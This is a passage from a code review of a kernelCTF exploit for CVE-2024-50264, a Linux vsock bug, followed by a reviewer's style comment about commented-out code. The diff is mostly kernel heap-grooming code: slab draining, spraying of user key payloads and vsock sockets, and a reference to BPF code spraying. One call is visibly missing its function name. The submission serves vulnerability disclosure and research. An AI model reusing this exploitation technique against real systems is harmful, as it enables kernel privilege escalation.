pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c

```diff
@@ -0,0 +1,851 @@
+			// exit(0);
+		}
+	}
+	/* wait for all forks to finish spraying BPF code */
+	read(stopfd[1], buf, 0x50);
+
+	return 0;
+}
+
+int sockets[0x1000];
+
+int sockets_child[0x1000];
+
+#define CC_OVERFLOW_FACTOR 1
+#define OBJS_PER_SLAB 0x2a
+#define CPU_PARTIAL 0x10
+
+#define DRAIN_SLABS_CNT ((CPU_PARTIAL + 1) * CC_OVERFLOW_FACTOR)
+
+union key_payload payload = {};
+union key_payload readout = {};
+key_serial_t keys[256] = {};
+const size_t payload_size = sizeof(payload.vvs) - sizeof(payload.key.header);
+
+int user_key_payload_counter = 0;
+int user_key_payloads[0x1000];
+void generate_full_slabs_with_user_key_payload()
+{
+	struct sockaddr_vm connect_addr = {0};
+	user_key_payload_counter = 0;
+	connect_addr.svm_family = AF_VSOCK;
+	connect_addr.svm_cid = VMADDR_CID_LOCAL;
+
+	for(int t=0; t<DRAIN_SLABS_CNT; t++)
+	{
+		for(int i=1; i<OBJS_PER_SLAB; i++)
+		{
+			if(i % OBJS_PER_SLAB)
+			{
+				connect_addr.svm_port = ++cid_port_num;
+				connect(sockets[i], (struct sockaddr *)&connect_addr, sizeof(connect_addr));
+			}
+			else
+			{
+				char desc[16] = {};
+				snprintf(desc, sizeof(desc) - 1, "-%d", ++user_key_payload_counter);
+
+				user_key_payloads[user_key_payload_counter] = 
+					(KEYRING_TYPE_USER, desc, &payload, KEYRING_KMALLOC_96, KEY_SPEC_PROCESS_KEYRING);
+			}
+		}
+	}
+
+	for(int i=0; i<OBJS_PER_SLAB; i++)
+	{
+		char desc[16] = {};
+		snprintf(desc, sizeof(desc) - 1, "-%d", ++user_key_payload_counter);
+		((uint64_t *)&payload)[0] = user_key_payload_counter;
+		user_key_payloads[user_key_payload_counter] = 
+			create_keyring(KEYRING_TYPE_USER, desc, &payload, KEYRING_KMALLOC_96, KEY_SPEC_PROCESS_KEYRING);
+	}
+}
+
+int *generate_spray_vvs_fd(int cnt)
+{
+	int *socks = calloc(sizeof(int), cnt);
+	for(int i=0; i<cnt; i++)
+	{
+		if((socks[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0)) < 0)
+			perror("socket");
+
+		unsigned long size = 0xeeff0011;
+		setsockopt(socks[i], AF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE, &size, sizeof(size));
+		size = 0;
+		setsockopt(socks[i], AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE, &size, sizeof(size));
+
+		struct timeval timeout = {
+				.tv_sec = 0,
+				.tv_usec = 1,
+		};
+		if(setsockopt(socks[i], AF_VSOCK, 8, &timeout, sizeof(struct timeval)) < 0)
+			perror("setsockopt");
+	}
+	return socks;
+}
+
+void spray_vvs(int *socks, int cnt)
+{
+	struct sockaddr_vm connect_addr = {0};
+	connect_addr.svm_family = AF_VSOCK;
+	connect_addr.svm_cid = VMADDR_CID_LOCAL;
+
+	for(int i=0; i<cnt; i++)
+	{
+		connect_addr.svm_port = ++cid_port_num;
+		connect(socks[i], (struct sockaddr *)&connect_addr, sizeof(connect_addr));
+	}
+}
+
+void release_all_socks()
+{
+	for(int t=0; t<DRAIN_SLABS_CNT; t++)
+		for(int i=1; i<OBJS_PER_SLAB; i++)
+			if(i % OBJS_PER_SLAB)
+				close(sockets[i]);
+	for(int i=0; i < OBJS_PER_SLAB; i++)
+		close(sockets_child[i]);
+}
+
+void fill_victim_slab()
+{
+	struct sockaddr_vm connect_addr = {0};
+
+	struct timespec tp;
+	// clock_gettime(CLOCK_BOOTTIME , &tp);
```

Comment:
Please remove commented out code (also the other occurrences in the file): https://google.github.io/security-research/kernelctf/style_guide#commented-out-code